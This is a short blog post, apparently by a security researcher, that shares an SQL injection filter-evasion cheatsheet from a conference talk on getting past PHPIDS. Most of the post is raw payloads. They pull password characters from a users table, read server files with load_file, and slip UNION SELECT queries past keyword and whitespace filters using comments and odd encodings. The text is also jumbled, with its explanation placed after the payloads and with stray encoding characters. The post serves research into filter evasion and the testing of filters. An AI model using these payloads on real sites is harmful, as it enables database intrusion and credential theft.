‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a ‘ and substr((select max(pass) from users),1,1)=’a ‘ and (select substr(group_concat(pass),1,1) from users)=’a OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING ‘ and length((select pass from users having substr(pass,1,1)=’a’)) ‘ and (select pass from users group by id having id = 1)=’a ‘ and (select pass from users where id =1)=’a ‘ and (select pass from users limit 1)=’secret (0)union(select(table_name),column_name,…Ġ/**/union/*!50000select*/table_name`foo`/**/…Ġ%a0union%a0select%09group_concat(table_name)….Ġ’union all select all`table_name`foo from`information_schema`. Space(0) = trim(version()from(version()))ĭes_encrypt(‘a’) != des_encrypt(‘A’) Keyword filter More detailed explaination can be found in the slides or in the talk (video should come online in a few weeks). For a quicker reference you can use the following cheatsheet. This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference.
0 Comments
Leave a Reply. |